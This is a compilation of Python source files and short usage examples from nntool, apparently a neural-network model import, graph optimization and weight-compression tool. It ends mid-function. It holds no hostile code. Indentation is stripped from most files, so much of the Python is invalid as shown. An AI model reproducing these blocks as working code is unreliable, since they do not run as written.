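mid = SimpleNamespace(NAME='fuse_pad', RUN_BEFORE=['fuse_convs'], RUN_AFTER=[])
other = SimpleNamespace(NAME='fuse_convs', RUN_BEFORE=[], RUN_AFTER=[])
last = SimpleNamespace(NAME='insert_copies', RUN_BEFORE=[], RUN_AFTER=['*'])

print([m.NAME for m in order_matchers([other, last, mid, first])])
# ['remove_noops', 'fuse_pad', 'fuse_convs', 'insert_copies']
```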
#### File: graph/types/utils.py
```python
def summarize_stats(stats):
    summary = {'mean': 0, 'std': 0,
               'amin': float('Infinity'), 'amax': float('-Infinity'),
               'lmin': float('-Infinity'), 'lmax': float('Infinity'),
               'min': 0, 'max': 0, 'range': float('-Infinity')}
for v in stats:
for k in ['mean', 'std', 'min', 'max']:
summary[k] += v[k]
summary['amin'] = min(summary['amin'], v['min'])
summary['amax'] = max(summary['amax'], v['max'])
summary['lmin'] = max(summary['lmin'], v['min'])
summary['lmax'] = min(summary['lmax'], v['max'])
summary['range'] = max(summary['range'], v['range'])
for k in ['mean', 'std', 'min', 'max']:
summary[k] /= len(stats)
for v in stats:
v['precision'] = v['range']/summary['range']
return summary
```
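A worked illustration of `summarize_stats` with invented numbers: `mean`/`std`/`min`/`max` are averaged, `amin`/`amax` are the absolute extremes, `lmin`/`lmax` are the bounds common to every tensor, and `range` is the widest individual range.
```python
# Invented numbers, purely to illustrate the aggregation above.
from graph.types.utils import summarize_stats

stats = [
    {'mean': 0.1, 'std': 0.5, 'min': -1.0, 'max': 2.0, 'range': 3.0},
    {'mean': 0.3, 'std': 0.7, 'min': -0.5, 'max': 4.0, 'range': 4.5},
]
summary = summarize_stats(stats)
# summary: mean 0.2, std 0.6, min -0.75, max 3.0,
#          amin -1.0, amax 4.0, lmin -0.5, lmax 2.0, range 4.5
# each entry in stats also gains 'precision' = its own range / summary['range']
```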
#### File: importer/common/handler_options.py
```python
class HandlerOptions():
HANDLER_OPTIONS = []
@staticmethod
def handler_option(name, val_type=str, default="", desc="description missing", shortcut=None):
def deco(cls):
# check if this class actually defines HANDLER_OPTIONS
if 'HANDLER_OPTIONS' not in cls.__dict__:
value = []
setattr(cls, 'HANDLER_OPTIONS', value)
else:
value = getattr(cls, 'HANDLER_OPTIONS')
value.append({'name': name, 'val_type': val_type, 'default': default,
'desc': desc, 'shortcut': shortcut})
return cls
return deco
@classmethod
def get_all_handler_options(cls):
options = {}
for subclass in cls.__subclasses__():
for option in getattr(subclass, 'HANDLER_OPTIONS'):
options[option['name']] = option
return options
@classmethod
def get_default_handler_options(cls):
options = {}
for subclass in cls.__subclasses__():
for option in getattr(subclass, 'HANDLER_OPTIONS'):
options[option['name']] = option['default']
return options
#pylint: disable=invalid-name
handler_option = HandlerOptions.handler_option
```
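A hypothetical sketch of how the decorator above is meant to be used: the handler class and the option are invented for illustration, and any `HandlerOptions` subclass decorated this way is then picked up by `get_all_handler_options` and `get_default_handler_options`.
```python
# Hypothetical handler and option, illustrating the decorator defined above.
from importer.common.handler_options import HandlerOptions, handler_option

@handler_option('fold_batchnorm', val_type=bool, default=True,
                desc='fold batch normalization layers into the preceding filter')
class MyBackendHandler(HandlerOptions):
    pass

print(HandlerOptions.get_all_handler_options()['fold_batchnorm']['default'])  # True
```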
#### File: handlers/backend/dequantize_linear.py
```python
import numpy as np
from importer.common.constant_mixin import ConstantMixin
from quantization.qtype import QType
from ..backend_handler import BackendHandler
from ..handler import onnx_op
@onnx_op("DequantizeLinear")
class DequantizeLinear(ConstantMixin, BackendHandler):
@classmethod
def _common(cls, node, **kwargs):
all_nodes = kwargs['all_nodes']
inputs = [all_nodes[inp] for inp in node.input]
axis = node.attrs.get('axis', None)
x = inputs[0]
scale = inputs[1]
zero_point = inputs[2] if len(inputs) > 2 else None
qtype = QType(
dtype=zero_point[0].value.dtype, scale=scale[0].value,
zero_point=zero_point[0].value, quantized_dimension=axis)
all_nodes[node.input[0]] = tuple(list(x)[0:3] + [qtype])
all_nodes[node.output[0]] = tuple(list(x)[0:3] + [None])
return x[0]
@classmethod
def version_10(cls, node, **kwargs):
return cls._common(node, **kwargs)
@classmethod
def version_13(cls, node, **kwargs):
return cls._common(node, **kwargs)
```
#### File: handlers/backend/pad.py
```python
import numpy as np
from graph.types import ConstantInputParameters, NNEdge
from graph.types.others import NoOPParameters, PadParameters
from importer.common.constant_mixin import ConstantMixin
from importer.common.provisional_dim import ProvisionalDim
from importer.onnx.common import logger
from ..backend_handler import BackendHandler
from ..handler import onnx_op, partial_support, ps_description
@onnx_op("Pad")
@partial_support(True)
@ps_description("Only constant pad amounts are supported."
"Only 2D padding is supported. Padding must be successfully fused into a "
"convolution or pooling operation to generate successfully. There is currently "
"no AutoTiler Pad generator.")
class Pad(ConstantMixin, BackendHandler):
@classmethod
def _common(cls, node, mode='constant', pads=None, constant_value=0, **kwargs):
all_nodes = kwargs['all_nodes']
G = kwargs['G']
valid_name = kwargs['valid_name']
inputs = [all_nodes[inp] for inp in node.input]
x = inputs[0]
x_shape = x[2].shape
ndim = len(x_shape)
npad = len(pads)//2
if npad != ndim:
if all(not pad for pad in pads):
logger.warning(f'Pad {valid_name} has {npad} pad values and {ndim} input rank. '
'Since pad is zero this is ignored but it probably indicates a bug in the ONNX graph.')
else:
raise ValueError(
                    f'Error in ONNX graph - pad {valid_name} has {npad} pad values and {ndim} input rank.')
apads = np.array([[pads[idx], pads[idx+ndim]] for idx in range(ndim)])
# apads = np.array(pads).reshape((-1, 2))
if cls.is_constant(x):
logger.info("reducing %s to a constant", valid_name)
val = cls.get_constant(x)
if mode == 'constant':
val = np.pad(val, apads, mode=mode,
constant_values=constant_value)
else:
val = np.pad(val, apads, mode=mode)
params = ConstantInputParameters(valid_name, value=val)
pshape = [
dim + sum(apads[idx]) if dim is not None else None for idx, dim in enumerate(x_shape)]
all_nodes[node.output[0]] = (
params, 0, ProvisionalDim(pshape), x[3])
return params
if mode != 'constant':
raise ValueError('%s - pad mode %s is not supported' %
(valid_name, mode))
if any(sum(pad) > 0 and x_shape[idx] is None for idx, pad in enumerate(apads)):
raise ValueError(
f'unknown/batch axis is being padded in {valid_name}. Manipulation of '
'unknown/batch axis is not supported')
trimmed_pads = tuple(
[pad for idx, pad in enumerate(apads) if x_shape[idx] is not None])
if all(sum(trimmed_pad) == 0 for trimmed_pad in trimmed_pads):
params = NoOPParameters(valid_name, desc="eliminated pad of 0")
pshape = x_shape
else:
pshape = [
dim + sum(apads[idx]) if dim is not None else None for idx, dim in enumerate(x_shape)]
# pshape = [None if dim is None else dim + sum(apads[idx]) for idx, dim in enumerate(x_shape)]
padvals = [(constant_value, constant_value)] * len(trimmed_pads)
params = PadParameters(
valid_name, padding=trimmed_pads, pad_vals=padvals)
G.add_edge(
NNEdge(from_node=x[0], to_node=params, from_idx=x[1], to_idx=0))
all_nodes[node.output[0]] = (params, 0, ProvisionalDim(pshape), x[3])
return params
@classmethod
def _args_version(cls, node, padkey='pads', **kwargs):
mode = node.attrs.get('mode', 'constant')
pads = node.attrs.get(padkey)
value = node.attrs.get('value')
return cls._common(node, mode=mode, pads=pads, constant_value=value, **kwargs)
@classmethod
def _inputs_version(cls, node, **kwargs):
mode = node.attrs.get('mode', 'constant')
if len(node.input) > 1 and node.input[1]:
y = kwargs['all_nodes'][node.input[1]]
pads = tuple(cls.get_constant(y))
if len(node.input) > 2 and node.input[2]:
z = kwargs['all_nodes'][node.input[2]]
value = cls.get_constant(z)
else:
value = 0
else:
raise ValueError('no pads input for node %s' %
kwargs['valid_name'])
return cls._common(node, mode=mode, pads=pads, constant_value=value, **kwargs)
@classmethod
def version_1(cls, node, **kwargs):
return cls._args_version(node, padkey='paddings', **kwargs)
@classmethod
def version_2(cls, node, **kwargs):
return cls._args_version(node, padkey='pads', **kwargs)
@classmethod
def version_11(cls, node, **kwargs):
return cls._inputs_version(node, **kwargs)
@classmethod
def version_13(cls, node, **kwargs):
return cls._inputs_version(node, **kwargs)
```
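A small worked example of the `apads` expression above: ONNX lists all the per-axis "begin" pad amounts followed by all the "end" amounts, and the handler regroups them into `(before, after)` pairs per axis. The shape and pad values below are invented.
```python
# Invented NCHW example: pad H by (1, 3) and W by (2, 4).
import numpy as np

pads = (0, 1, 2, 0, 0, 3, 4, 0)
ndim = len(pads) // 2
apads = np.array([[pads[idx], pads[idx + ndim]] for idx in range(ndim)])
# apads -> [[0, 0], [1, 3], [2, 4], [0, 0]]
```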
#### File: tflite2/common/tflite_graph.py
```python
from typing import Iterator, List
from importer.tflite2.common.tflite_node import TFLiteNode
from importer.tflite2.common.tflite_tensor import TFLiteTensorWrapper
from ..tflite_schema_head.Model import Model
from ..tflite_schema_head.SubGraph import SubGraph
from ..tflite_schema_head.Tensor import Tensor
class TFliteIterator():
def __init__(self, obj, len_prop, elem_prop) -> None:
self._obj = obj
self._len_prop = len_prop
self._elem_prop = elem_prop
self._idx = 0
def __len__(self):
return getattr(self._obj, self._len_prop)(self._obj)
def __next__(self):
if self._idx >= len(self):
raise StopIteration()
elem = getattr(self._obj, self._elem_prop)(self._obj, self._idx)
self._idx += 1
return elem
def __iter__(self):
self._idx = 0
return self
def __getitem__(self, idx):
return getattr(self._obj, self._elem_prop)(self._obj, idx)
class TFLiteGraph():
def __init__(self, model: Model, subgraph: SubGraph, subgraph_idx: int, name_cache=None, anonymise=False) -> None:
self._model = model
self._subgraph = subgraph
self._subgraph_idx = subgraph_idx
self._tensors = [TFLiteTensorWrapper(self._subgraph.Tensors(
idx), self._model) for idx in range(self._subgraph.TensorsLength())]
self._nodes = [TFLiteNode(self._subgraph.Operators(idx), idx, self._model,
self, name_cache=name_cache, anonymise=anonymise)
for idx in range(self._subgraph.OperatorsLength())]
@classmethod
def from_model(cls, model: Model, subgraph_idx: int, name_cache=None, anonymise=False):
return cls(model, model.Subgraphs(subgraph_idx), subgraph_idx,
name_cache=name_cache, anonymise=anonymise)
@property
def model_version(self) -> int:
return self._model.Version()
@property
def tensors(self) -> Iterator[Tensor]:
return self._tensors
@property
def input(self) -> List[TFLiteTensorWrapper]:
return [self.tensors[idx] for idx in self._subgraph.InputsAsNumpy()]
@property
def output(self) -> List[TFLiteTensorWrapper]:
return [self.tensors[idx] for idx in self._subgraph.OutputsAsNumpy()]
@property
def nodes(self) -> List[TFLiteNode]:
return self._nodes
@property
def idx(self):
return self._subgraph_idx
```
#### File: handlers/backend/filter_pad_mixin.py
```python
from graph.dim import PadDim
from importer.tflite2.tflite_schema_head.Padding import Padding
class FilterPadMixin(object):
@classmethod
def get_tf_padding(cls, padding):
if padding == Padding.SAME:
return PadDim.same()
if padding == Padding.VALID:
return PadDim.valid()
raise ValueError("Strange padding type")
```
#### File: handlers/backend/transpose_conv.py
```python
from graph.dim import Conv2DFilterDim, PadDim, StrideDim
from graph.types import NNEdge, TransposeConv2DParameters
from importer.common.constant_mixin import ConstantMixin
from importer.common.provisional_dim import ProvisionalDim
from importer.tflite2.common.tflite_node import TFLiteNode
from importer.tflite2.tflite_schema_head.Padding import Padding
from importer.tflite2.tflite_schema_head.TransposeConvOptions import \
TransposeConvOptions
from ..backend_handler import BackendHandler
from ..handler import tflite_op, partial_support, ps_description
from .filter_mixin import FilterMixin
@tflite_op("TRANSPOSE_CONV")
@partial_support(True)
@ps_description('Transpose Conv is only imported. No kernels are implemented for it. We suggest '
'using a resizer followed by a normal convolution.')
class TransposeConv(ConstantMixin, FilterMixin, BackendHandler):
@classmethod
def version_1(cls, node: TFLiteNode, **kwargs):
node_opts = node.get_options(TransposeConvOptions)
G = kwargs['G']
opts = kwargs['opts']
all_nodes = kwargs['all_nodes']
inputs = [all_nodes[t] for t in node.input]
x = inputs[2]
x_shape = x[2].shape
in_b, in_h, in_w, in_c = tuple(x_shape)
pout_shape = [dim if x_shape[idx] is not None else None for idx,
dim in enumerate(cls.get_constant(inputs[0]))]
out_b, out_h, out_w, out_c = tuple(pout_shape)
filt = inputs[1]
weights_node = filt[0]
filt_shape = filt[2].shape
# # ['in_c', 'h', 'w', 'out_c']
filt_out_c, filt_h, filt_w, filt_in_c = tuple(filt_shape)
filt_dim = Conv2DFilterDim(filt_h, filt_w,
filt_out_c, in_c=filt_in_c)
filt_dim = filt_dim.impose_order(cls.TF_LITE_FILTER_ORDER)
stride_w = node_opts.StrideW()
stride_h = node_opts.StrideH()
# compute padding
pad = node_opts.Padding()
if pad == Padding.SAME:
pad_h = ((in_h - 1) * stride_h + filt_h - out_h)
pad_w = ((in_w - 1) * stride_w + filt_w - out_w)
pad_top = pad_h // 2
pad_left = pad_w // 2
pad = PadDim(pad_top, pad_h - pad_top, pad_left,
pad_w - pad_left, same_type='balanced_right')
else:
pad = PadDim(0)
params = TransposeConv2DParameters(
node.name,
filt=filt_dim,
stride=StrideDim(
stride_h, stride_w),
padding=pad,
in_dims_hint=[['h', 'w', 'c'], cls.TF_LITE_FILTER_ORDER.copy()],
out_dims_hint=[['h', 'w', 'c']])
G.add_edge(
NNEdge(from_node=x[0], to_node=params, from_idx=x[1], to_idx=0))
G.add_edge(NNEdge(from_node=weights_node, to_node=params, to_idx=1))
pout_dims = ProvisionalDim(pout_shape)
all_nodes[node.output[0]] = (params, 0, pout_dims)
return params
```
#### File: handlers/backend/unconverted_mixin.py
```python
from graph.dim import Dim
from graph.types import UnconvertedOpParameters
from importer.tflite2.handlers.backend.math_mixin import BasicMathMixin
class UnconvertedMixin(BasicMathMixin):
@classmethod
def _common(cls, node, **kwargs):
all_nodes = kwargs['all_nodes']
inputs = [all_nodes[t] for t in node.input]
x = inputs[0]
return super(UnconvertedMixin, cls)._common(
node,
params_class=UnconvertedOpParameters,
params_args={
'indicated_op_name': cls.TFLITE_OP,
'indicated_outputs': [Dim.unnamed(x[2].known_shape)]
},
**kwargs)
@classmethod
def version_1(cls, node, **kwargs):
return cls._common(node, **kwargs)
```
#### File: importer/tflite2/remove_concats.py
```python
import logging
from graph.matches.matcher import find_forward
from graph.types import (ConcatParameters, NNEdge, NoOPParameters,
StridedSliceParameters)
from utils.node_id import NodeId
LOG = logging.getLogger('nntool.' + __name__)
def remove_concats(G):
concat_nodes = list([node for node in G.nodes() if isinstance(node, ConcatParameters)])
strided_slices_removed = []
concats_removed = []
for node in concat_nodes:
concat_out_edges = G.indexed_out_edges(node.name)[0]
concat_in_edges = G.indexed_in_edges(node.name)
axis_slices = []
start_idx = 0
# find the slice patterns that can match inputs
for in_idx, dim in enumerate(node.in_dims):
slice_patterns = [(start_idx, start_idx + dim.shape[node.axis], 1)]
if dim.shape[node.axis] == 1:
# can also match reversed
slice_patterns.append((start_idx, start_idx - 1, -1))
axis_slices.append(slice_patterns)
start_idx += dim.shape[node.axis]
for out_edge in concat_out_edges:
edge_lists = find_forward(G, out_edge,
StridedSliceParameters,
skip_node_classes=NoOPParameters)
# each list of edges goes to a strided slice
for edge_list in edge_lists:
edge = edge_list[-1]
assert isinstance(edge.to_node, StridedSliceParameters)
ssp = edge.to_node
LOG.info("found strided slice %s", ssp.name)
# must only slice axis of concat
if not ssp.only_slices_axis(node.axis):
LOG.info("rejected: slices more than one axis")
continue
# must match a slice pattern on the input
ssp_slice = ssp.act_slice[node.axis]
in_idx = None
for idx, slice_patterns in enumerate(axis_slices):
if ssp_slice in slice_patterns:
in_idx = idx
break
if in_idx is None:
LOG.info("rejected: slices pattern matching concat not found")
continue
LOG.info("removing slice %s", ssp.name)
strided_slices_removed.append(ssp.name)
# save the out edges
ssp_out_edges = G.out_edges(ssp.name)
in_edge = concat_in_edges[in_idx]
# remove all the nodes including the ssp
for inter_edge in edge_list:
if G.quantization:
del G.quantization[NodeId(inter_edge.to_node)]
G.remove(inter_edge.to_node)
# connect all the ssp out edges to the node on the concat input
for ssp_out_edge in ssp_out_edges:
G.add_edge(NNEdge(in_edge.from_node, ssp_out_edge.to_node,
from_idx=in_edge.from_idx,
to_idx=ssp_out_edge.to_idx))
# if the concat now has no out edges remove it
if G.num_out_edges(node.name) == 0:
LOG.info("removing concat %s", node.name)
concats_removed.append(node.name)
G.remove(node)
return (strided_slices_removed, concats_removed)
```
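A small illustration of the slice patterns built in the loop above, with invented sizes along the concat axis: each concat input is matched by the strided slice that selects exactly its span, and size-1 inputs additionally match the reversed slice.
```python
# Invented sizes along the concat axis; this reproduces the axis_slices loop above.
sizes_along_axis = [4, 1, 2]
axis_slices = []
start_idx = 0
for size in sizes_along_axis:
    slice_patterns = [(start_idx, start_idx + size, 1)]
    if size == 1:
        # a single-element span can also be matched by the reversed slice
        slice_patterns.append((start_idx, start_idx - 1, -1))
    axis_slices.append(slice_patterns)
    start_idx += size
# axis_slices -> [[(0, 4, 1)], [(4, 5, 1), (4, 3, -1)], [(5, 7, 1)]]
```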
#### File: interpreter/commands/compress.py
```python
import json
import math
import texttable
from cmd2 import Cmd, with_argparser
from interpreter.commands.validation import get_validator, validation_options
from interpreter.nntool_shell_base import (NODE_SELECTOR_HELP,
NNToolArguementParser,
NNToolShellBase)
from interpreter.shell_utils import input_options
from quantization.compression.auto_compress import AutoCompress
from quantization.compression.compress import CompressionError
from utils.node_id import NodeId
from graph.types import ConstantInputParameters
class CompressCommand(NNToolShellBase):
# COMPRESS COMMAND
parser_compress = NNToolArguementParser()
parser_compress.add_argument(
'step',
nargs='?',
help='constant input to compress. ' + NODE_SELECTOR_HELP,
completer_method=NNToolShellBase.node_step_or_name_completer(allow_comma=True))
parser_compress.add_argument(
'--no_sparse', action="store_true",
help='Do not check for sparsity'
)
parser_compress.add_argument(
'--force_sparse', action="store_true",
help='Force these layers to use sparse bit (adds an extra bin)'
)
parser_compress.add_argument(
'--threshold', type=float,
help='set values val>x>-val to 0 before clustering'
)
parser_compress_sub = parser_compress.add_subparsers(
title='compress subcommands', help='compression strategy for the selected layers')
parser_compress_bits = parser_compress_sub.add_parser(
'bits',
help='compress using a lookup index of a fixed number of bits')
parser_compress_bits.add_argument(
'num_bits', choices=list(str(v) for v in range(2, 8)),
help='number of bits to use for lookup table indexes'
)
parser_compress_min_qnsr = parser_compress_sub.add_parser(
'min_qsnr',
help='compress keeping the value QSNR above a minimum value')
parser_compress_min_qnsr.add_argument(
'qsnr', type=int,
help='QSNR to keep above'
)
parser_compress_auto = parser_compress_sub.add_parser(
'auto',
help='compress to a number of bits automatically using validation results')
parser_compress_auto.add_argument(
'--finetune', action="store_true",
help='Experimental layer finetuning'
)
validation_options(parser_compress_auto)
input_options(parser_compress_auto)
parser_compress_clear = parser_compress_sub.add_parser(
'clear',
help='clear compression on these nodes')
parser_compress_off = parser_compress_sub.add_parser(
'off',
help='disable compression on these nodes')
parser_compress_on = parser_compress_sub.add_parser(
'on',
help='enable compression on these nodes')
parser_compress_save = parser_compress_sub.add_parser(
'save',
help='save compression settings to a file in json format')
parser_compress_save.add_argument(
'file',
completer_method=Cmd.path_complete,
help='file to save to'
)
parser_compress_load = parser_compress_sub.add_parser(
'load',
help='load compression settings from a file in json format')
parser_compress_load.add_argument(
'file',
completer_method=Cmd.path_complete,
help='file to load from'
)
parser_compress_bits.set_defaults(operation='bits')
parser_compress_min_qnsr.set_defaults(operation='min_qsnr')
parser_compress_auto.set_defaults(operation='auto')
parser_compress_clear.set_defaults(operation='clear')
parser_compress_off.set_defaults(operation='off')
parser_compress_on.set_defaults(operation='on')
parser_compress_save.set_defaults(operation='save')
parser_compress_load.set_defaults(operation='load')
@with_argparser(parser_compress)
def do_compress(self, args):
"""
        Compress graph constants for the GAP9 compression engine. Compress with no arguments lists the current compression settings.
The compressed size in the results table includes the size of the codebook.
        In bits mode the number of bits used for table indexes is specified directly. It should be from 2 to 8.
In min_qsnr mode the tensors will be compressed with the number of bits necessary to stay above the given QSNR value. A
value of around 30 is a good starting point.
        The auto mode uses the validation engine to explore possible tensor compression parameters. The command options are the
same as the validate command. The first part of the process tries to find the lowest QSNR that can be selected for
compression of all viable parameters with no bad validation results.
The threshold argument can be used to clip values to zero before compression.
"""
self._check_graph()
if not args.step:
if hasattr(args, 'operation'):
nodes = self.G.nodes(node_classes=ConstantInputParameters)
else:
self.compress_make_table(self.G.nodes(
node_classes=ConstantInputParameters))
return
else:
nodes, _ = self.get_node_step_or_name(
args.step, classes=ConstantInputParameters, allow_comma=True)
if not nodes:
return
if not args.operation:
# No subcommand was provided, so call help
self.do_help('compress')
return
if args.operation == "clear":
for node in nodes:
node.use_compressed = False
node.compressed_value = None
self.pfeedback(f'clear compression on {node.name}')
return
if args.operation == "on":
for node in nodes:
if node.compressed_value:
node.use_compressed = True
self.pfeedback(f'enable compression on {node.name}')
else:
self.perror(
f"can't enable compression on {node.name} - not set")
return
if args.operation == "off":
for node in nodes:
node.use_compressed = False
self.pfeedback(f'disable compression on {node.name}')
return
if args.operation == "save":
save_map = {}
for node in nodes:
if node.compressed_value:
comp_val = node.compressed_value
save_map[node.name] = {
'bits': comp_val.bits,
'threshold': comp_val.threshold,
'sparse': bool(comp_val.sparse),
}
with open(args.file, 'w') as fp:
fp.write(json.dumps(save_map))
return
report_nodes = []
if args.operation == "load":
with open(args.file, 'r') as fp:
save_map = json.load(fp)
for node in nodes:
if node.name in save_map:
self.pfeedback(f"Loading parameters for {node.name}")
try:
params = save_map[node.name]
node.compress_value(
bits=params['bits'],
threshold=params['threshold'],
allow_sparse=params['sparse'],
force_sparse=params['sparse'],
)
comp_val = node.compressed_value
node.use_compressed = True
except CompressionError as ex:
self.pfeedback(f'unable to compress {node.name} - {ex}')
comp_val = None
if comp_val:
report_nodes.append(node)
return
elif args.operation == "auto":
if args.quantize:
self._check_quantized()
input_args = self._get_input_args(args)
autocompress = AutoCompress(
self.G,
args.input_files,
get_validator(args),
input_args,
prediction_step_idx=args.prediction_step_idx)
def progress(msg, newline):
print(msg, end='\n' if newline else '', flush=True)
try:
autocompress.tune_all(nodes, progress, quantize=args.quantize)
if args.finetune:
report_nodes = [node for node in nodes if node.use_compressed]
self.compress_make_table(report_nodes)
autocompress.finetune(nodes, progress, quantize=args.quantize)
except (KeyboardInterrupt, SystemExit):
pass
report_nodes = [node for node in nodes if node.use_compressed]
else:
for node in nodes:
self.pfeedback(f"Evaluating {node.name}")
nid = NodeId(node)
if self.G.quantization and nid in self.G.quantization:
qtype = self.G.quantization[nid].out_qs[0]
else:
qtype = None
try:
kwargs = {
'qtype': qtype,
'threshold': args.threshold,
'allow_sparse': not args.no_sparse,
'force_sparse': args.force_sparse
}
if args.operation == "bits":
kwargs['bits'] = int(args.num_bits)
elif args.operation == "min_qsnr":
kwargs['min_qsnr'] = args.qsnr
elif args.operation == "auto":
pass
else:
raise ValueError('strange operation')
node.compress_value(**kwargs)
comp_val = node.compressed_value
node.use_compressed = True
except CompressionError as ex:
self.pfeedback(f'unable to compress {node.name} - {ex}')
comp_val = None
if comp_val:
report_nodes.append(node)
self.compress_make_table(report_nodes)
def compress_make_table(self, nodes):
comp_size = 0
node_size = 0
comp_report = [["Step", "Name", "Orig Size",
"Compressed Size", "%age orig", "Bits", "Sparse", "Enabled"]]
for node in nodes:
if not node.compressed_value:
continue
nid = NodeId(node)
if self.G.quantization and nid in self.G.quantization:
qbits = self.G.quantization[NodeId(node)].out_qs[0].bits
else:
qbits = 8
old_size = int(math.floor((node.value.size * qbits)/8))
comp_val = node.compressed_value
node_size += node.value.size
comp_size += comp_val.size
comp_report.append([
node.step_idx, node.name, old_size, comp_val.size, (
100 * comp_val.size)//old_size,
comp_val.bits, "Yes" if comp_val.sparse else "No", "Yes" if node.use_compressed else "No"
])
if comp_size == 0:
self.pfeedback("no constants compressed")
return
comp_report.append([
"", "Total", node_size, comp_size, (100 *
comp_size)//node_size, "", "", ""
])
table = texttable.Texttable()
table.set_cols_align(['l', 'l', 'l', 'l', 'l', 'l', 'l', 'l'])
table.set_max_width(120)
table.add_rows(comp_report)
self.pfeedback("Compression report\n")
self.pfeedback(table.draw()+'\n')
```
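For reference, a hypothetical example of the JSON written by the `save` branch above and read back by `load`; the node names and values are invented, only the keys (`bits`, `threshold`, `sparse`) come from the code.
```python
# Invented content; the key names match what the save branch above writes.
import json

save_map = {
    "conv_1_weights": {"bits": 4, "threshold": 0.0, "sparse": False},
    "fc_2_weights": {"bits": 6, "threshold": 0.001, "sparse": True},
}
with open("compression_settings.json", "w") as fp:
    fp.write(json.dumps(save_map))
```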
#### File: nntool/interpreter/nntool_shell.py
```python
import logging
from interpreter.nntool_shell_base import NNToolShellBase
# pylint: disable=wildcard-import,unused-wildcard-import
from .commands import *
LOG = logging.getLogger("nntool")
VALID_LOG_LEVELS = [
"INFO",
"DEBUG",
"WARNING"
]
COMMANDS = NNToolShellBase.__subclasses__()
class CommandMixer(type):
def __new__(cls, name, base, ns):
return type.__new__(cls, name, tuple(COMMANDS + list(base)), ns)
class NNToolShell(NNToolShellBase, metaclass=CommandMixer):
intro = 'Welcome to NNTOOL. Type help or ? to list commands.\n'
prompt = '(NNT) '
```
#### File: nntool/quantization/handlers_helpers.py
```python
import logging
import numpy as np
from cmd2.argparse_custom import Cmd2ArgumentParser
from graph.types import ConstantInputParameters, ReluActivationParameters
from graph.types.base import Parameters
from iteration_utilities import duplicates
from utils.subclasses import get_all_subclasses
# pylint: disable=wildcard-import,unused-wildcard-import
from quantization.float.quantizers import *
from quantization.multiplicative.quantizers import *
from quantization.qtype import QType
from quantization.qtype_constraint import MatchAll
from quantization.quantizers import *
from quantization.symmetric.quantizers import *
from quantization.unified_quantization_handler import QuantizionHandler
LOG = logging.getLogger('nntool.' + __name__)
def add_in_handlers(existing, new):
for handler in new:
if handler not in existing:
existing.append(handler)
def get_quantization_handlers():
"""This sets up the handler map.
The priority for schemes is:
- If a handler is present for a class then for the declared scheme
or any scheme if SCHEME is None it is matched
- If a handler is present for a superclass of the class then for the
declared scheme or any scheme if SCHEME is None it is matched
- The default handler for the scheme is matched
"""
handlers = {}
schemes = set()
# Collect all handlers
for cls in get_all_subclasses(QuantizionHandler):
if not cls.PARAMS_TYPE:
continue
if cls.SCHEME:
schemes.add(cls.SCHEME)
for params_cls in cls.PARAMS_TYPE:
phandlers = handlers.setdefault(params_cls, {})
pscheme_handlers = phandlers.setdefault(cls.SCHEME, [])
pscheme_handlers.append(cls)
# Iterate through all parameters and set a scheme
for pclass in get_all_subclasses(Parameters):
# parameters does not define an op name
if not pclass.CLS_OP_NAME:
continue
# see if we have any handlers for this class
phandlers = handlers.setdefault(pclass, {})
for scheme in schemes:
# handlers for class and scheme are already present
matched_handlers = phandlers.setdefault(scheme, [])
for hpclass, class_handlers in handlers.items():
if hpclass == '__default__':
continue
if issubclass(pclass, hpclass):
# is subclass and scheme is present
if scheme in class_handlers:
add_in_handlers(matched_handlers,
class_handlers[scheme])
# is subclass and all schemes match is present
if None in class_handlers:
add_in_handlers(matched_handlers,
                                        class_handlers[None])
if not matched_handlers:
# match the default scheme
add_in_handlers(matched_handlers,
handlers['__default__'][scheme])
del handlers['__default__']
return handlers
def get_all_options():
options = {}
for handler in get_all_subclasses(QuantizionHandler):
if not handler.OPTIONS:
continue
for opt_name, opt in handler.OPTIONS.items():
optrec = options.setdefault(opt_name, {'handlers': set()})
for k in opt.keys():
if k in optrec:
if k != 'help' and opt[k] != optrec[k]:
raise ValueError(
f'Quantization option {k} has different definitions')
else:
optrec[k] = opt[k]
optrec['handlers'].add(handler)
return options
def get_all_options_by_params():
options = {}
for handler in get_all_subclasses(QuantizionHandler):
if handler.PARAMS_TYPE is None or not handler.OPTIONS:
continue
for params in handler.PARAMS_TYPE:
if params == '__default__':
params = Parameters
options.setdefault(params, {}).update(handler.OPTIONS)
for params in get_all_subclasses(Parameters):
poptions = {}
for k, v in options.items():
if issubclass(params, k):
poptions.update(v)
options[params] = poptions
return options
def add_options_to_parser(parser: Cmd2ArgumentParser):
opts = get_all_options()
shortcuts = [opt['shortcut'] for opt in opts.values() if 'shortcut' in opt]
duplicate_shortcuts = set(duplicates(shortcuts))
assert not duplicate_shortcuts, f'the following shortcut commands are duplicates {",".join(duplicate_shortcuts)}'
for opt_name, opt in opts.items():
if opt.get('type') is None:
continue # internal option
if 'shortcut' in opt:
names = [f'-{opt["shortcut"]}']
else:
names = []
if opt.get('type') == bool:
parse_options = {'help': opt.get('help'), 'action': 'store_true'}
if opt.get('default'):
names = [f'--no_{opt_name}']
else:
names.append(f'--{opt_name}')
parser.add_argument(*names, **parse_options)
else:
parse_options = {k: opt.get(k) for k in [
'type', 'choices', 'help']}
names.append(f'--{opt_name}')
parser.add_argument(*names, **parse_options)
def get_arg_or_default(args, opt_name, opt):
arg = getattr(args, opt_name)
if arg is None:
arg = opt.get('default')
return arg
def get_options_from_args(args):
return {opt_name: (not getattr(args, f'no_{opt_name}'))
if opt.get('type') == bool and opt.get('default')
else get_arg_or_default(args, opt_name, opt)
for opt_name, opt in get_all_options().items() if opt['type'] is not None}
def get_set_options_from_args(args):
return {opt_name: (not getattr(args, f'no_{opt_name}'))
if opt.get('type') == bool and opt.get('default')
else getattr(args, opt_name)
for opt_name, opt in get_all_options().items()
if getattr(args, f'no_{opt_name}' if opt.get('type') == bool
and opt.get('default') else opt_name) is not None}
def match_qtype(constraint, qtype_or_dict):
if qtype_or_dict is None:
return True
# constant always matches since it can always be mutated into a different type
if qtype_or_dict.is_constant:
return True
for k, v in constraint.items():
if isinstance(qtype_or_dict, dict):
if k not in qtype_or_dict:
return False
val = qtype_or_dict[k]
else:
if not hasattr(qtype_or_dict, k):
return False
val = getattr(qtype_or_dict, k)
if k == 'attr':
assert isinstance(
                v, dict), 'expecting dictionary for attribute match'
attr = qtype_or_dict.attr
if not all(hasattr(attr, attr_k) and getattr(attr, attr_k) == attr_val
for attr_k, attr_val in v.items()):
return False
elif isinstance(v, type(lambda: None)):
if not v(val):
return False
elif isinstance(v, set):
val = val if isinstance(val, set) else set([val])
if not (v & val):
return False
